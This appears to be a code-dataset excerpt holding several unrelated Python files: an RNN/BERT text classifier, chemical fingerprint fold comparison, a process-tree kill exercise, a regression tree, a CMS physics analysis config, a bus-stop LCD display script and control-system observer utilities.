accuracy_score\nimport torch.nn as nn\n\nclass BiRNN(nn.Module):\n def __init__(self, vocab_size, num_labels):\n \n super().__init__()\n \n self.embedding = nn.Embedding(vocab_size, 128)\n self.bigru = nn.GRU(128, 256, bidirectional=True)\n self.fc = nn.Linear(512, num_labels)\n self.num_labels = num_labels\n \n def forward(self, \n input_ids,\n labels):\n\n embedded = self.embedding(input_ids) \n out = self.bigru(embedded)\n logits = self.fc(out[0][:,0,:])\n loss = self.compute_loss(logits, labels)\n return {'loss':loss,\n 'logits':logits} \n \n def compute_loss(self, logits, labels):\n loss_fct = nn.CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels)\n return loss\n\nclass BaseModel:\n def __init__(self, config):\n self.model = nn.Module()\n self.num_labels = config['num_labels']\n self.model_name = config['model_name']\n self.vocab_size = config['vocab_size']\n\n self.device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n def train(self, datasets, epochs = 30, save_dir = '.'):\n train_dataset, valid_dataset, test_dataset = datasets \n filepath = os.path.join(save_dir, 'model.pth')\n best_accuracy = 0 \n for epoch in range(epochs):\n accuracy = 0 \n loss = 0 \n self.model.train().to(self.device)\n for _, batch in enumerate(train_dataset):\n batch = {k: v.to(self.device) for k, v in batch.items()}\n outputs = self.model(**batch)\n loss = outputs['loss']\n loss.backward()\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n labels = batch['labels'].cpu() \n preds = outputs['logits'].argmax(-1).cpu() \n accuracy += accuracy_score(labels, preds) /len(train_dataset)\n loss += loss / len(train_dataset)\n \n print(f\"Epoch {epoch} Train Loss {loss:.4f} Train Accuracy {accuracy:.4f}\")\n \n self.model.eval().to(self.device)\n results = self.evaluate_dataset(valid_dataset)\n print(f\"Epoch {epoch} Valid Loss {results['loss']:.4f} Valid Accuracy {results['accuracy']:.4f}\")\n\n val_accuracy = results['accuracy']\n if val_accuracy > best_accuracy:\n best_accuracy = val_accuracy\n torch.save(self.model.state_dict(), filepath)\n\n #Later to restore:\n \n self.model.load_state_dict(torch.load(filepath))\n self.model.eval()\n results = self.evaluate_dataset(test_dataset)\n print(f\"Test Loss {results['loss']:.4f} Test Accuracy {results['accuracy']:.4f}\")\n \n def evaluate_dataset(self, dataset):\n accuracy = 0\n loss = 0 \n for _, batch in enumerate(dataset):\n batch = {k: v.to(self.device) for k, v in batch.items()}\n outputs = self.model(**batch)\n loss = outputs['loss']\n labels = batch['labels'].cpu() \n preds = outputs['logits'].argmax(-1).cpu() \n accuracy += accuracy_score(labels, preds) /len(dataset)\n loss += loss / len(dataset)\n return {'loss':loss, 'accuracy':accuracy}\n\nclass SimpleClassificationModel(BaseModel):\n def __init__(self, config):\n BaseModel.__init__(self, config)\n self.model = BiRNN(self.vocab_size, self.num_labels)\n self.model.to(self.device) \n self.optimizer = AdamW(self.model.parameters(), lr=5e-5)\n\nclass BERTClassificationModel(BaseModel):\n def __init__(self, config):\n BaseModel.__init__(self, config)\n config = AutoConfig.from_pretrained(self.model_name,num_labels=self.num_labels)\n self.model = AutoModelForSequenceClassification.from_pretrained(self.model_name, config = config)\n self.optimizer = AdamW(self.model.parameters(), 
lr=5e-5)","sub_path":"nmatheg/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"100907972","text":"import pybel\nimport openbabel\nimport datetime\nimport os\nimport sys\nimport re\nimport time\nimport multiprocessing \nfrom multiprocessing import Pool\n\nnow = datetime.datetime.now()\n\ndef readFoldFile(fold):\n foldList = open(fold,'r').readlines()\n list2 = foldList\n tempLine = \"\"\n counter = 0\n for line in list2:\n tempLine = line.rstrip(\"\\n\")\n tempLine = tempLine.rstrip()\n line = tempLine\n list2[counter] = tempLine\n counter=counter+1\n return list2\n\n\n\n\ndef getFingerprintHM(csvData,dataPath,fileCol):\n data = open(csvData,'r')\n fingerprints = dict()\n counter = 0\n totalCounter = 0\n \n for line in data:\n tempLine = line.rstrip(\"\\n\")\n tempLine = tempLine.rstrip()\n line = tempLine\n\n cols = line.split(\", \")\n cols[0] = cols[0].rstrip()\n cols[1] = cols[1].rstrip()\n try:\n ms = pybel.readfile(\"sdf\",dataPath+cols[0])\n print(ms)\n output = list()\n fpsList = list()\n for m in ms: \n fp = m.calcfp()\n fpsList.append(fp)\n if len(fpsList)>0:\n fingerprints[cols[0]+\" \"+cols[1]] = fpsList\n counter = counter + 1\n totalCounter = totalCounter+1\n except:\n pass\n return fingerprints\n\n\n\n\n\ndef createFoldList(fingerprints, fold):\n foldList = list()\n for fps in fingerprints:\n for fp in fps:\n foldList.append(fp)\n\n\n\n\ndef compareFolds(fingerprintHM, fold1, fold2):\n\n strongestLink = list()\n weakestLink = list()\n for i in range(0,2):\n weakestLink.append(\"\")\n strongestLink.append(\"\")\n \n weakestLinkVal = float('inf');\n strongestLinkVal = float('-inf');\n simTotal = 0\n fold1List = readFoldFile(fold1)\n fold2List = readFoldFile(fold2)\n ms = \"\"\n counter = 0\n #valuesAccountedFor = 0\n extremeVals = [float('inf'),float('-inf'),0,0]\n\n\n for line in fold1List:\n print(line)\n #print(str(extremeVals[0])+\" \"+str(extremeVals[1]),str(int((counter/len(fold1List))*100)))\n counter = counter+1\n\n cols = line.split(\" \")\n ms = cols[3].rstrip(\"\\n\")\n ms = ms.rstrip()\n cols[1].rstrip()\n ms = ms+\" \"+cols[1]\n if ms in fingerprintHM:\n extremeVals = compareToSecondFold(fingerprintHM,ms,fold2List,extremeVals)\n \n output = \"For partitions: \"+ fold1 + \" and \"+ fold2+\"\\nAverage Similaraity: \"+str(float(extremeVals[3])/float(extremeVals[2]))+\"\\nstrongest link: \" + str(extremeVals[1]) +\"\\nweakest link: \"+str(extremeVals[0])+\"\\n\\n\"\n print(output)\n return output\n\n\n\n\n\ndef compareToSecondFold(fingerprintHM, ms,fold2List,extremeVals):\n for line2 in fold2List:\n cols2 = line2.split(\" \")\n ms2 = cols2[3].rstrip()+\" \"+cols2[1].rstrip()\n if ms2 in fingerprintHM:\n sim = fingerprintHM[ms][0] | fingerprintHM[ms2][0]\n #simTotal = simTotal +sim\n extremeVals[3] = extremeVals[3]+sim\n if sim < extremeVals[0]:\n #weakestLinkVal = sim\n extremeVals[0] = sim\n #weakestLink[0] = ms\n #extremeVals[0][1] = ms\n #weakestLink[1] = ms2\n #extremeVals[0][2] = ms2\n if sim > extremeVals[1]:\n #strongestLinkVal\n extremeVals[1] = sim\n #strongestLink\n #extremeVals[1][1] = ms\n #strongestLink\n #extremeVals[1][2] = ms2\n #valuesAccountedFor = valuesAccountedFor +1\n extremeVals[2] = extremeVals[2]+1\n return(extremeVals)\n\n\n\n\n\n\ndef getSimilaritiesBetweenFolds(foldArr,csvData,dataPath,foldPath,ouputPath):\n fpsHM = getFingerprintHM(csvData,dataPath,3)\n output = list()\n for fold in range(0,len(foldArr)-1):\n 
for fold2 in range(fold+1, len(foldArr)):\n output.append(compareFolds(fpsHM,foldPath+foldArr[fold], foldPath+foldArr[fold2]))\n \n now = datetime.datetime.now()\n with open((foldPath+\"foldSimilaritySDF.txt\"),'w+') as newTest:\n newTest.writelines(\"%s\\n\" % item for item in output)\n\n\n\n\n\n\ndef getTrainFiles(foldPath):\n paths = getPaths(foldPath)\n r = re.compile(\".*test\")\n trainPaths = list(filter(r.match, paths))\n return trainPaths\n\n\n\n\n\ndef runner(foldPath,csvPath,dataPath,outputPath):\n trainFiles = getTrainFiles(foldPath)\n getSimilaritiesBetweenFolds(trainFiles,csvPath,dataPath,foldPath,outputPath)\n\n\n\n\ndef getPaths(path):\n paths = list()\n for filename in os.listdir(path):\n paths.append(filename)\n return paths\n\n\nfoldPath = sys.argv[1]\ncsvPath = sys.argv[2]\ndataPath = sys.argv[3]\noutputPath = sys.argv[4]\n\nrunner(foldPath,csvPath,dataPath,outputPath)\n\n","sub_path":"Project/fingerprintSDF.py","file_name":"fingerprintSDF.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"470711753","text":"# Description\n# Given n processes, each process has a unique PID (process id) and its PPID (parent process id).\n# \n# Each process only has one parent process, but may have one or more children processes. This is just like a tree structure. Only one process has PPID that is 0, which means this process has no parent process. All the PIDs will be distinct positive integers.\n# \n# We use two list of integers to represent a list of processes, where the first list contains PID for each process and the second list contains the corresponding PPID.\n# \n# Now given the two lists, and a PID representing a process you want to kill, return a list of PIDs of processes that will be killed in the end. You should assume that when a process is killed, all its children processes will be killed. 
No order is required for the final answer.\n# \n# The given kill id is guaranteed to be one of the given PIDs.\n# n >= 1.\n## See https://leetcode.com/articles/kill-process/\n\n## IDEA: brute force where you kill a process, find it children and continue\nclass Solution:\n \"\"\"\n @param pid: the process id\n @param ppid: the parent process id\n @param kill: a PID you want to kill\n @return: a list of PIDs of processes that will be killed in the end\n \"\"\"\n def killProcess(self, pid, ppid, kill):\n # Write your code here\n res = [kill]\n if kill == 0:\n res.extend(list(set(pid)))\n return res\n \n parent = [i for i in range(0,len(ppid)) if ppid[i] == kill]\n while len(parent) > 0:\n tmp = parent.pop()\n res.append(pid[tmp])\n tmp_parent = [i for i in range(0,len(ppid)) if ppid[i] == pid[tmp]]\n parent.extend(tmp_parent)\n return res\n\n##############################################################################################\n##############################################################################################\n## IDEA: optimizing the solution using adjList representation of graphs\nfrom collections import defaultdict\nclass Solution:\n \"\"\"\n @param pid: the process id\n @param ppid: the parent process id\n @param kill: a PID you want to kill\n @return: a list of PIDs of processes that will be killed in the end\n \"\"\"\n def killProcess(self, pid, ppid, kill):\n def bfs(frontier, adjList, res):\n if len(frontier) == 0:\n return res\n new_frontier = []\n for f in frontier:\n res.append(f)\n new_frontier.extend(adjList[f])\n return bfs(new_frontier,adjList,res)\n # Write your code here\n res = [kill]\n if kill == 0:\n res.extend(list(set(pid)))\n return res\n \n adjList = defaultdict(list)\n for i in range(0,len(ppid)):\n adjList[ppid[i]].append(pid[i])\n \n return bfs([kill],adjList,[]) ","sub_path":"IQGoogle/src/com/iq/bloomberg/KillProcess.py","file_name":"KillProcess.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"604998326","text":"from __future__ import print_function\nimport Num as num\nimport Lists as lst\nimport Tbl as tbl\nimport itertools\nimport config\nimport Tbl\nfrom Tbl import Tbl\n\nthe = config\n\nclass Range:\n def __init__(self, t, yfun, pos, attr, val):\n self._t = t\n self._kids = []\n self.yfun = yfun\n self.pos = pos\n self.attr = attr\n self.val = val\n self.stats = num.c().updates(t.rows, yfun)\n\ndef create(t, yfun, pos=None, attr=None, val=None):\n return Range(t, yfun, pos, attr, val)\n\ndef fun(x): return x.val\n\ndef order(t, y):\n\n def xpect(col):\n tmp = 0\n for _, x in col.nums.items():\n tmp = tmp + x.sd * x.n / col.n\n return tmp\n\n def whatif(head, y):\n class Detail:\n def __init__(self, head):\n self.pos = head.pos\n self.what = head.txt\n self.nums = {}\n self.n = 0\n\n col = Detail(head)\n for _, row in enumerate(t.rows):\n x = row.cells[col.pos]\n if x != '?':\n col.n = col.n + 1\n p = col.nums.get(x) or num.c()\n p.update(y(row))\n col.nums[x] = p\n\n class KeyVal:\n def __init__(self, key, val):\n self.key = key\n self.val = val\n\n return KeyVal(xpect(col), col)\n\n out = []\n for _,h in enumerate(t.x.cols):\n out.append(whatif(h,y))\n out = sorted(out, key=lambda x: x.key)\n return lst.collect(out, fun)\n\ndef grow1(above, yfun, rows, lvl, b4, pos=None, attr=None, val=None):\n def pad(): return ':20'.format(itertools.repeat('| ', lvl))\n def likeAbove():\n return above._t.copy(rows)\n if len(rows) >= 2:\n if lvl <= 10:\n 
here = above if (lvl == 0) else create(likeAbove(), yfun, pos, attr, val)\n if here.stats.sd < b4:\n if lvl > 0:\n above._kids.append(here)\n cuts = order(here._t, yfun)\n cut = cuts[1].val\n kids = {}\n for _, r in enumerate(rows):\n val = r.cells[cut.pos]\n if val != '?':\n rows1 = kids.get(val) if kids.get(val) != None else []\n rows1.append(r)\n kids[val] = (rows1)\n for val, rows1 in kids.items():\n if len(rows1) < len(rows):\n grow1(here, yfun, rows1, lvl + 1, here.stats.sd, cut.pos, cut.what, val)\n\ndef grow(t, y):\n yfun = y\n root = create(t,yfun)\n grow1(root, yfun, t.rows,0,2**32)\n return root\n\ndef leaf(tr,cells, bins, lvl):\n lvl=lvl if lvl != 0 else 0\n for j,kid in enumerate(tr._kids):\n pos,val = kid.pos, kid.val\n if cells[kid.pos] == kid.val:\n return leaf(kid, cells, bins, lvl+1)\n return tr\n\ndef tprint(tr, lvl=0):\n def pad():\n return \"| \" * (lvl - 1)\n\n def left(x):\n return \"%-20s\" % x\n\n lvl = lvl or 0\n suffix = \"\"\n if len(tr._kids) == 0 or lvl == 0:\n suffix = \"n=%s mu=%-.2f sd=%-.2f\" % (tr.stats.n, tr.stats.mu, tr.stats.sd)\n if lvl == 0:\n print(\"\\n{}\".format(suffix))\n else:\n # must_be = left( \"{}{} = {}\".format(pad(), tr.attr or \"\", tr.val or \"\"))\n print(left(\"{}{} = {}\".format(pad(), str(tr.attr) or \"\", str(tr.val) or \"\")), suffix, sep='\\t:\\t ')\n for j in range(len(tr._kids)):\n tprint(tr._kids[j], lvl + 1)\n\n\ndef treePrint(tr, lvl=0):\n\n def pad():\n return \"| \" * (lvl)\n\n def left(x):\n return \"%-20s\" % x\n\n suffix = \"\"\n if len(tr._kids) == 0 or lvl == 0:\n suffix = \"n=%s mu=%-.2f sd=%-.2f\" % (tr.stats.n, tr.stats.mu, tr.stats.sd)\n if lvl == 0:\n print\n \"\\n\" + suffix\n else:\n print\n left(\n \"{}{} = {}\".format(pad(), str(tr.attr) or \"\", str(tr.val) or \"\")), '\\t: ', suffix\n for j in range(len(tr._kids)):\n treePrint(tr._kids[j], lvl + 1)\n\n\ndef test(f, y):\n the.tree_min = 10\n y = y or \"dom\"\n f = f or \"auto.csv\"\n\n tb1 = Tbl(f)\n t2 = tb1.discretizeRows(y, tb1)\n\n # for head in t2.x.cols:\n # if head.bins:\n # print(len(head.bins), head.txt)\n\n tr = grow(t2, y=t2.dom(tb1))\n tprint(tr)\n #show(tr)\n# print(t2.spec)\nif __name__ == \"__main__\":\n test(\"/home/rahulgutal4/auto.csv\", \"dom\")","sub_path":"HW5/SdTree.py","file_name":"SdTree.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"542053893","text":"import FWCore.ParameterSet.Config as cms\nprocess = cms.Process('HiForest')\nprocess.options = cms.untracked.PSet(\n # wantSummary = cms.untracked.bool(True)\n #SkipEvent = cms.untracked.vstring('ProductNotFound')\n)\n\n#####################################################################################\n# HiForest labelling info\n#####################################################################################\n\nprocess.load(\"HeavyIonsAnalysis.JetAnalysis.HiForest_cff\")\nprocess.HiForest.inputLines = cms.vstring(\"HiForest V3\",)\nimport subprocess\nversion = subprocess.Popen([\"(cd $CMSSW_BASE/src && git describe --tags)\"], stdout=subprocess.PIPE, shell=True).stdout.read()\nif version == '':\n version = 'no git info'\nprocess.HiForest.HiForestVersion = cms.untracked.string(version)\n\n\n#####################################################################################\n# Input source\n#####################################################################################\n\nprocess.source = cms.Source(\"PoolSource\",\n duplicateCheckMode = 
cms.untracked.string(\"noDuplicateCheck\"),\n fileNames = cms.untracked.vstring(\"file:/uscms_data/d3/jiansun/data/1CC46C43-99B9-E311-B9CF-FA163E4A10E1_highpt_rereco_run181913.root\")\n # fileNames = cms.untracked.vstring(\"file:hiReco_RAW2DIGI_L1Reco_RECO_1001_2_8Ow.root\")\n )\n\n# Number of events we want to process, -1 = all events\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(10))\n\n\n#####################################################################################\n# Load Global Tag, Geometry, etc.\n#####################################################################################\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('Configuration.Geometry.GeometryDB_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_38T_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nprocess.load('Configuration.StandardSequences.Digi_cff')\nprocess.load('Configuration.StandardSequences.SimL1Emulator_cff')\nprocess.load('Configuration.StandardSequences.DigiToRaw_cff')\nprocess.load('Configuration.StandardSequences.RawToDigi_cff')\nprocess.load('Configuration.StandardSequences.ReconstructionHeavyIons_cff')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\n\n# PbPb 53X MC\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'GR_R_53_LV6::All', '')\n\nfrom HeavyIonsAnalysis.Configuration.CommonFunctions_cff import *\noverrideGT_PbPb2760(process)\noverrideJEC_pp2760(process)\n\nprocess.HeavyIonGlobalParameters = cms.PSet(\n centralityVariable = cms.string(\"HFtowers\"),\n nonDefaultGlauberModel = cms.string(\"\"),\n centralitySrc = cms.InputTag(\"hiCentrality\")\n )\n\n#####################################################################################\n# Define tree output\n#####################################################################################\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName=cms.string(\"HiForest_reduce.root\"))\n\nprocess.load('HeavyIonsAnalysis.JetAnalysis.TrkAnalyzers_cff')\n\n#####################################################################################\n\n#########################\n# Track Analyzer\n#########################\nprocess.anaTrack.qualityStrings = cms.untracked.vstring('highPurity','highPuritySetWithPV')\n\n# set track collection to iterative tracking\nprocess.anaTrack.trackSrc = cms.InputTag(\"hiGeneralTracks\")\n\n# clusters missing in recodebug - to be resolved\nprocess.anaTrack.doPFMatching = False\n\n\n######################\n\nprocess.load('HeavyIonsAnalysis.EventAnalysis.hievtanalyzer_data_cfi')\nprocess.load('HeavyIonsAnalysis.EventAnalysis.hltanalysis_cff')\nprocess.load('HeavyIonsAnalysis.JetAnalysis.EventSelection_cff')\n\n#Filtering\n# Minimum bias trigger selection (later runs)\nprocess.load(\"HLTrigger.HLTfilters.hltHighLevel_cfi\")\nprocess.hltMinBiasHFOrBSC = process.hltHighLevel.clone()\nprocess.hltMinBiasHFOrBSC.HLTPaths = [\"HLT_HIMinBiasHfOrBSC_v1\"]\nprocess.load(\"HeavyIonsAnalysis.Configuration.collisionEventSelection_cff\")\n\nprocess.skimanalysis.superFilters = cms.vstring(\"ana_step\")\n\nprocess.photonStep = cms.Sequence(process.hiGoodTracks * process.photon_extra_reco * process.makeHeavyIonPhotons * process.selectedPatPhotons)\nprocess.photonStep.remove(process.interestingTrackEcalDetIds)\nprocess.photonStep.remove(process.photonMatch)\nprocess.photonStep.remove(process.seldigis)\nprocess.reducedEcalRecHitsEB = 
cms.EDProducer(\"ReducedRecHitCollectionProducer\",\n interestingDetIdCollections = cms.VInputTag(cms.InputTag(\"interestingEcalDetIdEB\"), cms.InputTag(\"interestingEcalDetIdEBU\")),\n recHitsLabel = cms.InputTag(\"ecalRecHit\",\"EcalRecHitsEB\"),\n reducedHitsCollection = cms.string('')\n)\nprocess.reducedEcalRecHitsEE = cms.EDProducer(\"ReducedRecHitCollectionProducer\",\n interestingDetIdCollections = cms.VInputTag(cms.InputTag(\"interestingEcalDetIdEE\")),\n recHitsLabel = cms.InputTag(\"ecalRecHit\",\"EcalRecHitsEE\"),\n reducedHitsCollection = cms.string('')\n)\n\nprocess.pcollisionEventSelection = cms.Path(process.collisionEventSelection)\nprocess.pHBHENoiseFilter = cms.Path( process.HBHENoiseFilter )\nprocess.phfCoincFilter = cms.Path(process.hfCoincFilter )\nprocess.phfCoincFilter3 = cms.Path(process.hfCoincFilter3 )\nprocess.pprimaryVertexFilter = cms.Path(process.primaryVertexFilter )\nprocess.phltPixelClusterShapeFilter = cms.Path(process.siPixelRecHits*process.hltPixelClusterShapeFilter )\nprocess.phiEcalRecHitSpikeFilter = cms.Path(process.hiEcalRecHitSpikeFilter )\n\n\nprocess.ana_step = cms.Path(process.photonStep *\n process.hltanalysis *\n process.hltobject *\n process.hiEvtAnalyzer *\n#temp process.hltMuTree +\n process.HiForest \n )\n\nprocess.pAna = cms.EndPath(process.skimanalysis)\n\n\n\n","sub_path":"runForest_PbPb_DATA_53X_reduce.py","file_name":"runForest_PbPb_DATA_53X_reduce.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"635054455","text":"#!/usr/bin python3\n# -*- coding: utf-8 -*-\n\n# 12/02/2020 bus stop passenger information screen\n\nimport time\nimport datetime\nimport requests\nimport json\nimport I2C_LCD_driver\nfrom gpiozero import CPUTemperature\ncpu = CPUTemperature()\nmylcd = I2C_LCD_driver.lcd()\n\n# turkish \"Ç\" character.\nturkcec = [\n [0b01110,\n 0b10001,\n 0b10000,\n 0b10000,\n 0b10000,\n 0b10001,\n 0b01110,\n 0b00100],\n]\n\nmylcd.lcd_display_string(\"INT BAGLANTISI\", 1)\nmylcd.lcd_display_string(\"KURULDU\", 2)\ntime.sleep(1.5)\nmylcd.lcd_clear()\n\ndef get_otobus(durak):\n parsed = None\n url = \"https://service.kentkart.com//api/bus/closest?accuracy=0&authType=1&busStopId=\" + durak + \"&lang=tr&lat=0&lng=0&nfcSupport=0®ion=007&token='PERSONAL TOKEN HERE'&version=WEB_4.0_2\"\n response = requests.get(url)\n data = response.text\n parsed = json.loads(data)\n otobusler = []\n for i in range(len(parsed[\"busList\"])): # appends buses to .\n if parsed[\"busList\"][i][\"disabledPerson\"] == 0: # checks if it can carry disabled passenger.\n otobusler.append(\n str(parsed[\"busList\"][i][\"displayRouteCode\"]) + \" \" + parsed[\"busList\"][i][\"stopDiff\"] + \"drk \" +\n parsed[\"busList\"][i][\"timeDiff\"] + \"dk \" + \"E\")\n else:\n otobusler.append(\n str(parsed[\"busList\"][i][\"displayRouteCode\"]) + \" \" + parsed[\"busList\"][i][\"stopDiff\"] + \"drk \" +\n parsed[\"busList\"][i][\"timeDiff\"] + \"dk\")\n return otobusler\n\nwhile True:\n try:\n while True:\n kentkart = get_otobus(\"BUS STOP ID HERE\")\n starttime = time.time()\n while len(kentkart) > 0:\n for x in range(0, len(kentkart), 2):\n mylcd.lcd_clear()\n # first line of lcd\n if kentkart[x][0] == \"Ç\": # all of the bus ids start with 'Ç' here so no need to check actually\n mylcd.lcd_load_custom_chars(turkcec)\n mylcd.lcd_write(0x80)\n mylcd.lcd_write_char(0)\n mylcd.lcd_display_string(kentkart[x][1:], 1, 1)\n else:\n mylcd.lcd_display_string(kentkart[x], 1)\n if x == 
len(kentkart) - 1:\n time.sleep(11)\n break\n # second line of lcd\n if kentkart[x + 1][0] == \"Ç\": \n mylcd.lcd_load_custom_chars(turkcec)\n mylcd.lcd_write(0xc0)\n mylcd.lcd_write_char(0)\n mylcd.lcd_display_string(kentkart[x + 1][1:], 2, 1)\n else:\n mylcd.lcd_display_string(kentkart[x + 1], 2)\n time.sleep(11)\n\n if (\n time.time() - starttime) >= 11.0: # api refreshes busses location every 11seconds so to update we check if its been 11secs.\n starttime = time.time()\n kentkart = get_otobus(\"BUS STOP ID HERE\")\n else:\n mylcd.lcd_clear()\n while True: # display date, time and cpu temp while theres no bus to show.\n kentkart = get_otobus(\"BUS STOP ID HERE\")\n mylcd.lcd_display_string(time.strftime(\"%d/%m/%Y\"), 1,3)\n mylcd.lcd_display_string(time.strftime(\"%H:%M:%S\" + \" T:\" + \"{:.1f}\".format(cpu.temperature)), 2)\n mylcd.lcd_write_char(223,1)\n time.sleep(1)\n if len(kentkart) > 0:\n break\n continue\n\n except requests.exceptions.ConnectionError:\n mylcd.lcd_display_string(\"INTERNET \", 1)\n mylcd.lcd_display_string(\"BAGLANTISI YOK \", 2)\n continue\n except:\n mylcd.lcd_display_string(\"BIR SORUN OLDU \", 1)\n mylcd.lcd_display_string(\"AMA NE BILMIYORM\", 2)\n continue\n","sub_path":"busstop.py","file_name":"busstop.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"221420314","text":"\"\"\"\nThis is a procedural interface to the ctrl_utils library\n\nroberto.bucher@supsi.ch\n\nThe following commands are provided:\n\nDesign and plot commands\n full_obs - full order observer\n red_obs - reduced order observer\n comp_form - state feedback controller+observer in compact form\n comp_form_i - state feedback controller+observer+integ in compact form\n set_aw - introduce anti-windup into controller\n grstep - graphical step response\n init_par - get xi and wn fron os and Ts\n xi2os - get os from xi\n os2xi - get xi from os\n ts2wn - get wn from xi and ts\n wn2ts - get ts from xi and wn\n\"\"\"\n\nfrom numpy import hstack, vstack, imag, zeros, eye, mat, shape, pi, sqrt, log, exp, isscalar, linspace\nfrom scipy import poly \nfrom scipy.linalg import inv, eigvals\nimport matplotlib.pyplot as plt\nfrom control import TransferFunction, StateSpace, ss, tf, step_response, place\n\ndef full_obs(sys,poles):\n \"\"\"Full order observer of the system sys\n\n Call:\n obs=full_obs(sys,poles)\n\n Parameters\n ----------\n sys : System in State Space form\n poles: desired observer poles\n\n Returns\n -------\n obs: ss\n Observer\n\n \"\"\"\n if isinstance(sys, TransferFunction):\n \"System must be in state space form\"\n return\n a=mat(sys.A)\n b=mat(sys.B)\n c=mat(sys.C)\n d=mat(sys.D)\n L=place(a.T,c.T,poles)\n L=mat(L).T\n Ao=a-L*c\n Bo=hstack((b-L*d,L))\n n=shape(Ao)\n m=shape(Bo)\n Co=eye(n[0],n[1])\n Do=zeros((n[0],m[1]))\n obs=StateSpace(Ao,Bo,Co,Do,sys.dt)\n return obs\n\ndef red_obs(sys,T,poles):\n \"\"\"Reduced order observer of the system sys\n\n Call:\n obs=red_obs(sys,T,poles)\n\n Parameters\n ----------\n sys : System in State Space form\n T: Complement matrix\n poles: desired observer poles\n\n Returns\n -------\n obs: ss\n Reduced order Observer\n\n \"\"\"\n if isinstance(sys, TransferFunction):\n \"System must be in state space form\"\n return\n a=mat(sys.A)\n b=mat(sys.B)\n c=mat(sys.C)\n d=mat(sys.D)\n T=mat(T)\n P=mat(vstack((c,T)))\n invP=inv(P)\n AA=P*a*invP\n ny=shape(c)[0]\n nx=shape(a)[0]\n nu=shape(b)[1]\n\n A11=AA[0:ny,0:ny]\n A12=AA[0:ny,ny:nx]\n 
A21=AA[ny:nx,0:ny]\n A22=AA[ny:nx,ny:nx]\n\n L1=place(A22.T,A12.T,poles)\n L1=mat(L1).T\n\n nn=nx-ny\n\n tmp1=mat(hstack((-L1,eye(nn,nn))))\n tmp2=mat(vstack((zeros((ny,nn)),eye(nn,nn))))\n Ar=tmp1*P*a*invP*tmp2\n \n tmp3=vstack((eye(ny,ny),L1))\n tmp3=mat(hstack((P*b,P*a*invP*tmp3)))\n tmp4=hstack((eye(nu,nu),zeros((nu,ny))))\n tmp5=hstack((-d,eye(ny,ny)))\n tmp4=mat(vstack((tmp4,tmp5)))\n\n Br=tmp1*tmp3*tmp4\n\n Cr=invP*tmp2\n\n tmp5=hstack((zeros((ny,nu)),eye(ny,ny)))\n tmp6=hstack((zeros((nn,nu)),L1))\n tmp5=mat(vstack((tmp5,tmp6)))\n Dr=invP*tmp5*tmp4\n \n obs=StateSpace(Ar,Br,Cr,Dr,sys.dt)\n return obs\n\ndef comp_form(sys,obs,K):\n \"\"\"Compact form Conroller+Observer\n\n Call:\n contr=comp_form(sys,obs,K)\n\n Parameters\n ----------\n sys : System in State Space form\n obs : Observer in State Space form\n K: State feedback gains\n\n Returns\n -------\n contr: ss\n Controller\n\n \"\"\"\n nx=shape(sys.A)[0]\n ny=shape(sys.C)[0]\n nu=shape(sys.B)[1]\n no=shape(obs.A)[0]\n\n Bu=mat(obs.B[:,0:nu])\n By=mat(obs.B[:,nu:])\n Du=mat(obs.D[:,0:nu])\n Dy=mat(obs.D[:,nu:])\n\n X=inv(eye(nu,nu)+K*Du)\n\n Ac = mat(obs.A)-Bu*X*K*mat(obs.C);\n Bc = hstack((Bu*X,By-Bu*X*K*Dy))\n Cc = -X*K*mat(obs.C);\n Dc = hstack((X,-X*K*Dy))\n contr = StateSpace(Ac,Bc,Cc,Dc,sys.dt)\n return contr\n\ndef comp_form_i(sys,obs,K,Cy=[[1]]):\n \"\"\"Compact form Conroller+Observer+Integral part\n Only for discrete systems!!!\n\n Call:\n contr=comp_form_i(sys,obs,K [,Cy])\n\n Parameters\n ----------\n sys : System in State Space form\n obs : Observer in State Space form\n K: State feedback gains\n Cy: feedback matric to choose the output for integral part\n\n Returns\n -------\n contr: ss\n Controller\n\n \"\"\"\n if sys.dt==None:\n print('contr_form_i works only with discrete systems!')\n return\n \n Ts = sys.dt\n ny=shape(sys.C)[0]\n nu=shape(sys.B)[1]\n nx=shape(sys.A)[0]\n no=shape(obs.A)[0]\n ni=shape(mat(Cy))[0]\n\n B_obsu = mat(obs.B[:,0:nu])\n B_obsy = mat(obs.B[:,nu:nu+ny])\n D_obsu = mat(obs.D[:,0:nu])\n D_obsy = mat(obs.D[:,nu:nu+ny])\n\n k=mat(K)\n nk=shape(k)[1]\n Ke=k[:,nk-ni:]\n K=k[:,0:nk-ni]\n X = inv(eye(nu,nu)+K*D_obsu);\n\n a=mat(obs.A)\n c=mat(obs.C)\n Cy=mat(Cy)\n\n tmp1=hstack((a-B_obsu*X*K*c,-B_obsu*X*Ke))\n\n tmp2=hstack((zeros((ni,no)),eye(ni,ni)))\n A_ctr=vstack((tmp1,tmp2))\n\n tmp1=hstack((zeros((no,ni)),-B_obsu*X*K*D_obsy+B_obsy))\n tmp2=hstack((eye(ni,ni)*Ts,-Cy*Ts))\n B_ctr=vstack((tmp1,tmp2))\n\n 